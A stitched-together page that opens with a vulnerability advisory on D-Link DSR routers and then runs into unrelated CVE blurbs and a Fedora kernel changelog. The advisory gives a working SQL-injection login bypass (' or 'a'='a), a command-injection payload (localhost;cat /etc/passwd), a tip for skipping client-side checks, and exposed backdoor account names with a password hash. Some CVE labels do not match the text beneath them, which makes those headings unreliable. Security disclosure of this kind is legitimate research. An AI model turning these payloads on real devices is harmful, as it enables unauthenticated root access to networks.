D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#]["Password"] fields in /tmp/teamf1.cfg.ascii.

**Zine: D-Link DSR Router Series - Remote Command Execution**

    #
    # CVEs:                  
    #     CVE-2013-5945 - Authentication Bypass by SQL-Injection
    #     CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
    # 
    # Vulnerable Routers:    
    #     D-Link DSR-150 (Firmware < v1.08B44)
    #     D-Link DSR-150N (Firmware < v1.05B64)
    #     D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
    #     D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
    #     D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
    #
    # Download URL:      
    #     http://tsd.dlink.com.tw
    # 
    # Arch:                  
    #     mips and armv6l, Linux
    # 
    # Author:                
    #     0_o -- null_null
    #     nu11.nu11 [at] yahoo.com
    #
    # Date:                  
    #     2013-08-18
    # 
    # Purpose:               
    #     Get a non-persistent root shell on your D-Link DSR. 
    # 
    # Prerequisites:         
    #     Network access to the router ports 443 and 23.
    #     !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
    #
    #
    # A list of identified vulns follows. This list is not exhaustive as I assume
    # more vulns are present that just slipped my attention. 
    # The fact that D-Link implemented a backdoor user (for what reason, please??)
    # and just renamed it instead of completely removing it after it was targetted
    # by my previous exploit, as well as the triviality of those vulns I found 
    # makes me suggest that more vulns are present that are comparably easy to
    # exploit.
    #
    # Since 2013-12-03, patches are available for:
    #   DSR-150:                Firmware v1.08B44
    #   DSR-150N:               Firmware v1.05B64
    #   DSR-250 and DSR-250N:   Firmware v1.08B44
    #   DSR-500 and DSR-500N:   Firmware v1.08B77
    #   DSR-1000 and DSR-1000N: Firmware v1.08B77
    # via http://tsd.dlink.com.tw
    #
    # And now, have a worthwhile read :-)
    #
    
    
    0. Contents:
    
    
    1. Vulnerability: Authentication Bypass by SQL-Injection 
                      (CVE-2013-5945)
    2. Vulnerability: Privilege Escalation by Arbitrary Command Execution 
                      (CVE-2013-5946)
    3. Exposure:      D-Link backdoor user
    4. Vulnerability: Use of weak hash algorithms
    5. Exposure:      Passwords are stored as plain text in config files
    6. Vulnerability: Bad permissions on /etc/shadow
    
    
    
    1. Vulnerability: Authentication Bypass by SQL-Injection
                      (CVE-2013-5945)
    
    
    * Possible via the global webUI login form.
    
    * File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:
    
      function login.authenticate(tablename, tableInput)
        local username = tableInput["Users.UserName"]
        local password = tableInput["Users.Password"]
        local cur = db.execute(string.format([[
                      SELECT *, ROWID AS _ROWID_ FROM %s
              WHERE %s = '%s' AND %s = '%s'
          ]], tablename, "UserName", username, "Password", password))
        local result = false
        local statusCode = "NONE"
        if cur then
          local row = cur:fetch({}, "a")
          cur:close()
          result = row ~= nil
          if result == false then
            statusCode = "USER_LOGIN_INVALID_PASSWORD"
          end
        end
        return result, statusCode
      end
    
    * This function creates an SQL statement of the form:
    
      SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';
    
    * Since there is a default admin user account called "admin" around, this is 
      easily exploitable by providing this to the login form:
    
      username = admin
      password = ' or 'a'='a
    
    * ...resulting in this SQL statement:
    
      SELECT * 
        FROM "Users" 
        WHERE "UserName" = 'admin' 
          AND "Password" = '' or 'a'='a';
    
    * Old school SQL injection. Ohh, by the way...
    
    * The same fault can be found in captivePortal.lua 
      -- FREE NETWORKS FOR EVERYONE --
    
    
    
    2. Vulnerability: Privilege Escalation by Arbitrary Command Execution 
                      (CVE-2013-5946)
    
    
    * Possible from the Tools --> System Check page.
    
    * File /pfrm2.0/var/www/systemCheck.htm contains:
    
      local function runShellCmd(command)
          local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
          local cmdOutput = pipe:read("*a")
          pipe:close()
          return cmdOutput
      end
      if (ButtonType and ButtonType == "ping") then
      [...]
      local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
            globalCmdOutput = runShellCmd (cmd_ping) 
            statusMessage = "Pinging " .. ipToPing
      [...]
      elseif (ButtonType and ButtonType == "traceroute") then
      [...]
        local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
        globalCmdOutput = runShellCmd(cmd)
        statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
      [...]
      elseif (ButtonType and ButtonType == "dnslookup") then
      [...]
        util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
        statusMessage = "DNS Lookup for " .. internetNameToNsLookup
      [...]
    
    * Command injection is possible in at least these form sections:
      
      Ping or Trace an IP Address
      Perform a DNS Lookup
      
    * When using a browser, deactivate the "onclick" JavaScript checks using 
      a tool like Firebug. Tools like curl are not hindered by these checks.
      
    * All forms allow input like this:
      
      localhost;<command>
      
      example: 
      
      localhost;cat /etc/passwd
      
    * This user provided value is then directly used as part of the input for the
      call to runShellCmd(c) and thus io.popen(c) in the first form section and 
      os.execute(c) in the second form section.
      
    * Output from user provided commands gets displayed on the next page beneath 
      the benign command output.
      
      example: 
      
      [...]
      <textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
        traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
         1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms
        root:!:0:0:root:/root:/bin/sh
        gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
        nobody:x:0:0:nobody:/nonexistent:/bin/false
        ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
        guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
        admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
      </textarea>
      [...]
      
      
      
    3. Exposure: D-Link backdoor user:
      
      
    * This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:
    
      root:!:0:0:root:/root:/bin/sh
      gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
      nobody:x:0:0:nobody:/nonexistent:/bin/false
      ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
      guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
      admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
    
    * You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". 
      That was the account I hacked before with my previous exploit: 
      http://www.exploit-db.com/papers/22930/
      And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. 
      Instead of removing the backdoor, D-Link just created a new one. 
      
    * I verified this by showing the /etc/profile:
      
      # /etc/profile
      LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
      PATH=.:/pfrm2.0/bin:$PATH
      CLISH_PATH=/etc/clish
      export PATH LD_LIBRARY_PATH CLISH_PATH
      # redirect all users except root to CLI
      if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
      trap "/bin/login" SIGINT
      trap "" SIGTSTP
      /pfrm2.0/bin/cli
      exit
      fi
      PS1='DSR-250N> '
      
      
      
    4. Vulnerability: Use of weak hash algorithms:
    
    
    * In the /etc/shadow, salted DES hashes are used to store user passwords.
      Since this hash type supports at most 8 characters, users can log in by just 
      typing the first 8 letters of their passwords when using SSH or telnet.
      
    * An effective password length limitation of 8 characters makes brute force 
      attacks on user accounts very feasible, even if the user chose a longer 
      password.
    
    
    
    5. Exposure: Passwords are stored as plain text in config files:
    
    
    * A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the 
      /tmp/system.db is built on boot time, reveals that all user passwords are 
      stored in plain text.
    
      Example:
    
      [...]  
      Users = {}
      Users[1] = {}
      Users[1]["Capabilities"] = ""
      Users[1]["DefaultUser"] = "1"
      Users[1]["UserId"] = "1"
      Users[1]["FirstName"] = "backdoor"
      Users[1]["OID"] = "0"
      Users[1]["GroupId"] = "1"
      Users[1]["UserName"] = "gkJ9232xXyruTRmY"
      Users[1]["Password"] = "thisobviouslyisafakepass"
      Users[1]["UserTimeOut"] = "10"
      Users[1]["_ROWID_"] = "1"
      Users[1]["LastName"] = "ssl"
      [...]
      
      
      
    6. Vulnerability: Bad permissions on /etc/shadow
    
    
    * This file should have 600 permissions set and not 644. It is world readable.
      Pointless, since every process runs as root, no user separation is 
      done anyway.
    
      DSR-250N> ls -l -a /etc/shadow
      -rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow
      DSR-250N> ps
        PID USER       VSZ STAT COMMAND
          1 root      2700 S    init
          2 root         0 SW<  [kthreadd]
          3 root         0 SW<  [ksoftirqd/0]
          4 root         0 SW<  [events/0]
          5 root         0 SW<  [khelper]
          8 root         0 SW<  [async/mgr]
        111 root         0 SW<  [kblockd/0]
        120 root         0 SW<  [khubd]
        123 root         0 SW<  [kseriod]
        128 root         0 SW<  [kslowd]
        129 root         0 SW<  [kslowd]
        150 root         0 SW   [pdflush]
        151 root         0 SW   [pdflush]
        152 root         0 SW<  [kswapd0]
        200 root         0 SW<  [aio/0]
        210 root         0 SW<  [nfsiod]
        220 root         0 SW<  [crypto/0]
        230 root         0 SW<  [cns3xxx_spi.0]
        781 root         0 SW<  [mtdblockd]
        860 root         0 SW<  [usbhid_resumer]
        874 root         0 SW<  [rpciod/0]
        903 root         0 SWN  [jffs2_gcd_mtd4]
        909 root         0 SWN  [jffs2_gcd_mtd5]
        918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
        999 root      1816 S <  /pfrm2.0/udev/sbin/udevd --daemon
       1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db
       1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db
       1049 root      2704 S    /usr/sbin/telnetd -l /bin/login
       1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd
       1141 root     37000 S    /pfrm2.0/bin/sshd
       1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
       1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db
       1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
       1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db
       1560 root         0 SW<  [key_timehandler]
       1598 root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
       1600 root      8036 S    rvgd /tmp/system.db
       1612 root         0 SW   [cavium]
       1621 root      8424 S    vpnKAd /tmp/system.db
       1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d
       1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d
       1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd
       1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
       1771 root      2680 S    /pfrm2.0/bin/statusD
       1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db
       1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db
       1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db
       2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db
       2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db
       2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db
       2205 root      1904 S    /pfrm2.0/bin/fReset
       2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh
       2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100
       2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
       2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
       3355 root      1768 S    /pfrm2.0/bin/rt2860apd
       3443 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
       3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
       3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
       3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
       3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
       3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
       5353 root      2704 S    -sh
       7877 root      2568 S    sleep 60
       7953 root      2568 S    sleep 60
       8008 root      2704 R    ps
      16749 root      2704 S    -sh
      25690 root         0 SW<  [RtmpCmdQTask]
      25692 root         0 SW<  [RtmpWscTask]
      DSR-250N>

CVE-2013-7005: Offensive Security’s Exploit Database Archive

Integer overflow in the rsCStrExtendBuf function in runtime/stringbuf.c in the imfile module in rsyslog 4.x before 4.6.6, 5.x before 5.7.4, and 6.x before 6.1.4 allows local users to cause a denial of service (daemon hang) via a large file, which triggers a heap-based buffer overflow.

CVE-2011-4623: rsyslog/ChangeLog at master · rsyslog/rsyslog

The print_fatal_signal function in kernel/signal.c in the Linux kernel before 2.6.32.4 on the i386 platform, when print-fatal-signals is enabled, allows local users to discover the contents of arbitrary memory locations by jumping to an address and then reading a log file, and might allow local users to cause a denial of service (system slowdown or crash) by jumping to an address.

**updates at fedoraproject.org** updates at fedoraproject.org  
_Fri Jan 22 22:36:26 UTC 2010_

*   Previous message: Fedora 11 Update: cclive-0.5.8-1.fc11
*   Next message: Fedora 12 Update: mono-2.4.3.1-1.fc12
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

\--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2010-0919
2010-01-22 22:11:51
--------------------------------------------------------------------------------

Name        : kernel
Product     : Fedora 11
Version     : 2.6.30.10
Release     : 105.2.4.fc11
URL         : http://www.kernel.org/
Summary     : The Linux kernel
Description :
The kernel package contains the Linux kernel (vmlinuz), the core of any
Linux operating system.  The kernel handles the basic functions
of the operating system: memory allocation, process allocation, device
input and output, etc.

--------------------------------------------------------------------------------
Update Information:

Security update: CVE-2010-0003 CVE-2010-0006 CVE-2010-0007
--------------------------------------------------------------------------------
ChangeLog:

\* Tue Jan 19 2010 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.10-105.2.4
- CVE-2010-0003: kernel: infoleak if print-fatal-signals=1
\* Tue Jan 19 2010 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.10-105.2.3
- CVE-2010-0007: kernel: normal users can modify ebtables rules (#555238)
\* Tue Jan 19 2010 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.10-105.2.2
- Backport fix for CVE-2010-0006:
  kernel: ipv6: skb\_dst() can be NULL in ipv6\_hop\_jumbo() (rhbz#555217)
\* Fri Dec 25 2009 Dan Williams <dcbw at redhat.com\> 2.6.30.10-105.2.1
- libertas: fix crash on 64-bit platforms with >= 4GB RAM
\* Thu Dec 24 2009 Kyle McMartin <kyle at redhat.com\> 2.6.30.10-105
- fuse: fix kunmap in fuse\_ioctl\_copy\_user, #549400
\* Tue Dec  8 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.10-104
- Copy fix for #540580 from F-12.
\* Fri Dec  4 2009 Kyle McMartin <kyle at redhat.com\> 2.6.30.10-103
- 2.6.30.10
- nuke ipv4-fix-null-ptr-deref-in-ip\_fragment.patch, it's in the latest
  stable release.
\* Thu Dec  3 2009 Kyle McMartin <kyle at redhat.com\> 2.6.30.9-102
- ipv4-fix-null-ptr-deref-in-ip\_fragment.patch: null ptr deref
  bug fix.
\* Thu Nov 19 2009 Kyle McMartin <kyle at redhat.com\>
- fuse-prevent-fuse\_put\_request-in-invalid-ptr.patch: fix oops in fuse
  when low on memory. rhbz#538734.
\* Thu Nov 19 2009 David Woodhouse <David.Woodhouse at intel.com\> 2.6.30.9-100
- Re-enable CONFIG\_DMAR\_GFX\_WA on x86\_64.
\* Tue Nov 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-99
- Silence pointless DRM warning message (#537196)
\* Tue Nov 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-98
- More sata\_nv fixes (#524756).
\* Mon Nov 16 2009 Eric Sandeen <sandeen at redhat.com\> 2.6.30.9-97
- Fix ext4 preallocation-related corruption (#513221)
\* Tue Nov  3 2009 Kyle McMartin <kyle at redhat.com\> 2.6.30.9-96
- fs/pipe.c: fix null pointer dereference (CVE-2009-3547)
\* Sun Oct 25 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-95
- Disable the stack protector on functions that don't have onstack arrays.
\* Thu Oct 22 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-94
- Fix overflow in KVM cpuid code. (CVE-2009-3638)
\* Thu Oct 22 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-93
- Fix exploitable oops in keyring code (CVE-2009-3624)
\* Wed Oct 21 2009 Kyle McMartin <kyle at redhat.com\>
- shut-up-LOCK\_TEST\_WITH\_RETURN.patch: sort out #445331... or paper bag
  over it for now until the lock warnings can be killed.
\* Mon Oct 19 2009 Kyle McMartin <kyle at redhat.com\>
- af\_unix-fix-deadlock-connecting-to-shutdown-socket.patch: fix for
  rhbz#529626 local DoS. (CVE-2009-3621)
\* Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-90
- Fix null deref in r128 (F10#487546) (CVE-2009-3620)
\* Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-89
- Keyboard and mouse fixes from 2.6.32 (#522126)
\* Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-88
- Scheduler wakeup patch, fixes high latency on wakeup
  (sched-update-the-clock-of-runqueue-select-task-rq-selected.patch)
\* Fri Oct 16 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-87
- Fix uninitialized data leak in netlink (CVE-2009-3612)
\* Thu Oct 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-86
- AX.25 security fix (CVE-2009-2909)
\* Thu Oct 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-85
- Disable CONFIG\_USB\_STORAGE\_CYPRESS\_ATACB because it causes failure
  to boot from USB disks using Cypress bridges (#524998)
\* Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-84
- Copy libata drive detection fix from 2.6.31.4 (#524756)
\* Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-83
- Networking fixes taken from 2.6.31-stable
\* Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-82
- Fix boot hang with ACPI on some systems.
\* Mon Oct 12 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-81
- Critical ftrace fixes:
  ftrace-use-module-notifier-for-function-tracer.patch
  ftrace-check-for-failure-for-all-conversions.patch
  tracing-correct-module-boundaries-for-ftrace\_release.patch
\* Thu Oct  8 2009 Ben Skeggs <bskeggs at redhat.com\>     2.6.30.9-80
- ppc: compile nvidiafb as a module only, nvidiafb+nouveau = bang! (rh#491308)
\* Wed Oct  7 2009 Dave Jones <davej at redhat.com\>       2.6.30.9-78
- Disable IRQSOFF tracer. (Adds unnecessary overhead when unused)
\* Wed Oct  7 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-77
- eCryptfs fixes taken from 2.6.31.2 (fixes CVE-2009-2908)
\* Tue Oct  6 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-76
- fix race in forcedeth network driver (#526546)
\* Tue Oct  6 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-75
- x86: Don't leak 64-bit reg contents to 32-bit tasks.
\* Tue Oct  6 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-74
- ACPI EC bug fixes taken from kernel 2.6.32 (#492699, #525681)
\* Mon Oct  5 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-73
- Linux 2.6.30.9
\* Sun Oct  4 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-72.rc3
- Copy stack randomization fix from 2.6.31.2 (F10#526882)
\* Sun Oct  4 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-71.rc3
- Linux 2.6.30.9-rc3
- Drop merged upstream patches:
  linux-2.6-cifs-reenable-lanman-security.patch
  kvm-guest-fix-bogus-wallclock-physical-address-calculation.patch
  kvm-mmu-make-\_\_kvm\_mmu\_free\_some\_pages-handle-empty-list.patch
  kvm-vmx-check-cpl-before-emulating-debug-register-access.patch
  kvm-vmx-fix-cr8-exiting-control-clobbering-by-ept.patch
  kvm-x86-disallow-hypercalls-for-guest-callers-in-rings-0.patch
  linux-2.6-kvm-revert-x86-check-for-cr3-validity.patch
\* Fri Oct  2 2009 Justin M. Forbes <jforbes at redhat.com\>  2.6.30.8-70
- Add linux-2.6-virtio-net-refill-on-out-of-memory.patch, from 2.6.31
  to prevent page allocation failures in guests. (#520119)
\* Mon Sep 28 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.8-69
- Add linux-2.6-kvm-revert-x86-check-for-cr3-validity.patch, from
  2.6.32-rc, fixes bug #525743
\* Mon Sep 28 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.8-68
- Drop sched-disable-NEW-FAIR-SLEEPERS-for-now.patch, reported to
  cause problems on 2.6.30.
\* Sat Sep 26 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.8-67
- Scheduler fixes cherry-picked from 2.6.32
\* Sat Sep 26 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.8-66
- Backport "appletalk: Fix skb leak when ipddp interface is not loaded"
  (fixes CVE-2009-2903)
\* Sat Sep 26 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-65
- KVM fixes from 2.6.31.1, including fix for CVE-2009-3290
\* Fri Sep 25 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-64
- Fix serious CFQ performance regression.
\* Fri Sep 25 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-63
- Disable the GEM graphics manager on i686 PAE kernels
  (fixes modesetting on Intel graphics.)
\* Fri Sep 25 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-62
- Fix breakage in hostap driver (#522269)
\* Thu Sep 24 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-61
- Backport the cpuidle-faster-io fix from Fedora 12 to fix I/O
  performance problems when reading/writing multiple disks.
\* Thu Sep 24 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-60
- Linux 2.6.30.8
\* Thu Sep 24 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-59
- Disable sound powersave by default; it still pops when playing sounds. (#523836)
\* Wed Sep 16 2009 Justin M. Forbes <jforbes at redhat.com\> 2.6.30.7-58
- Revert virtio\_blk to rotational mode. (#509383)
\* Tue Sep 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-57
- Linux 2.6.30.7
\* Tue Sep 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-56.rc1
- Fix CIFS security flags mask broken in 2.6.30 (#523173)
\* Tue Sep 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-55.rc1
- Fix cpufreq lockdep warnings (#522685)
\* Sat Sep 12 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-54.rc1
- 2.6.30.7-rc1
- Drop patches merged in -stable:
   linux-2.6-slub-fix-destroy-by-rcu.patch
\* Thu Sep 10 2009 Dennis Gilmore <dennis at ausil.us\> 2.6.30.6-53
- kgdb only works on sparc64 smp kernels so disable on the up one and enable on the smp one
- update to 256 cpus supported on sparc64 smp
\* Wed Sep  9 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.6-52
- Add linux-2.6-slub-fix-destroy-by-rcu.patch (fixes bug in 2.6.30.4)
\* Wed Sep  9 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.6-51
- 2.6.30.6
- Drop patches merged in -stable:
  do\_sigaltstack-avoid-copying-stack\_t-as-a-structure-to-userspace.patch
  linux-2.6-x86-dont-send-ipi-to-empty-set-cpus.patch
  linux-2.6-bitmap-make-ops-return-result.patch
  linux-2.6-x86-dont-call-send-ipi-mask-with-empty-mask.patch
  linux-2.6-clone-fix-race-between-copy-process-and-de-thread.patch
  linux-2.6-kthreads-fix-kthread-create-vs-kthread-stop.patch
  linux-2.6-xen-x86-dont-probe-if-apics-are-disabled.patch
\* Tue Sep  8 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-50
- Disable Amiga One support to fix powerpc coherency bug (#521703)
\* Fri Sep  4 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-49
- Fix build system getting confused during firmware install.
\* Fri Sep  4 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-48
- Added additional fixes needed for #514787:
  linux-2.6-ppc64-vs-broadcom-lmb-no-init-\*.patch
- Fix up lirc patch context so it applies.
\* Wed Sep  2 2009 Jarod Wilson <jarod at redhat.com\>
- Make it possible to rmmod lirc\_zilog w/o it hanging indefinitely
- Add transmit support (via port 2 only) on 1st-gen mceusb transceiver
\* Tue Sep  1 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-46
- Fix yet another Xen boot crash (#520517)
\* Tue Sep  1 2009 Jarod Wilson <jarod at redhat.com\> 2.6.30.5-45
- Refresh lirc patches, add new lirc\_ene0100 driver
- Fix up hdpvr driver for use with modular i2c so that
  lirc\_zilog can actually bind to it
- Make lirc\_zilog IR transmit and receive work on the hdpvr
- Fix audio on PVR-500 when used in same system as HVR-1800 (#480728)
\* Fri Aug 28 2009 David Woodhouse <David.Woodhouse at intel.com\>
- Enable Solos DSL driver
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-43
- Don't load the floppy driver automatically:
  linux-2.6-defaults-die-floppy-die.patch
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-42
- Fix stackprotector problems with Xen on x86\_64.
- Disable stackprotector on i386 until 32-bit Xen gets fixed.
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-41
- linux-2.6-kthreads-fix-kthread-create-vs-kthread-stop.patch:
  fix race in kthreads.
\* Thu Aug 27 2009 Justin M. Forbes <jforbes at redhat.com\> 2.6.30.5-40
- xen: Fix guest crash when trying to debug. (#458385)
\* Thu Aug 27 2009 John W. Linville <linville at redhat.com\> 2.6.30.5-39
- zd1211rw: adding 083a:e503 as a ZD1211B device (#518538)
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-38
- Fix string overflows found by stackprotector:
  hda-check-strcpy-length.patch
  linux-2.6-v4l-dvb-af9015-fix-stack-corruption.patch
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-37
- Fix race in clone() syscall.
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-36
- Fix hangs on older x86 systems with 440\*X chipsets.
\* Fri Aug 21 2009 David Woodhouse <David.Woodhouse at intel.com\>
- Fix b43 on iMac G5 (#514787)
\* Tue Aug 18 2009 Kyle McMartin <kyle at redhat.com\>
- Backport several upstream commits 52dec22e739eec8f3a0154f768a599f5489048bd
  to improve mmap\_min\_addr.
- CVE-2009-2847: do\_sigaltstack: avoid copying 'stack\_t' as a
  structure to user space
\* Mon Aug 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-32
- Change config options:
  CONFIG\_SCSI\_DEBUG=m
  CONFIG\_PCI\_MSI\_DEFAULT\_ON=y
\* Mon Aug 17 2009 Jarod Wilson <jarod at redhat.com\> 2.6.30.5-31
- Fix flub in prior lirc patch update that resulted in no lirc
  drivers getting built
\* Sun Aug 16 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-29
- Linux 2.6.30.5
\* Fri Aug 14 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-28.rc2
- Linux 2.6.30.5-rc2
- Dropped drm-intel-tv-fix.patch, merged in -stable now.
\* Wed Aug 12 2009 Kyle McMartin <kyle at redhat.com\>
- drm-no-gem-on-i8xx.patch: fix misspelled IS\_8XX & IS\_I845G, sigh.
\* Wed Aug 12 2009 Kyle McMartin <kyle at redhat.com\>
- DRM patch sync-up with F-11-2.6.29.y, ABI probably isn't right yet though...
 - drm-modesetting-radeon.patch
 - drm-nouveau.patch
 - drm-no-gem-on-i8xx.patch
 - drm-i915-resume-force-mode.patch
 - drm-intel-big-hammer.patch
 - drm-intel-gen3-fb-hack.patch
 - drm-intel-hdmi-edid-fix.patch
 - drm-modesetting-radeon-fixes.patch
 - drm-radeon-new-pciids.patch
 - drm-dont-frob-i2c.patch
 - drm-intel-tv-fix.patch
 - drm-radeon-cs-oops-fix.patch
 - drm-pnp-add-resource-range-checker.patch
 - drm-i915-enable-mchbar.patch
- The rest were merged upstream.
\* Wed Aug 12 2009 John W. Linville <linville at redhat.com\>
- iwlwifi: fix TX queue race
\* Mon Aug 10 2009 Kyle McMartin <kyle at redhat.com\>
- Patch sync-up with F-11-2.6.29.y:
 - linux-2.6-x86-delay-tsc-barrier.patch
 - linux-2.6-fs-cifs-fix-port-numbers.patch
 - linux-2.6-kvm-skip-pit-check.patch
 - linux-2.6.29-xen-disable-gbpages.patch
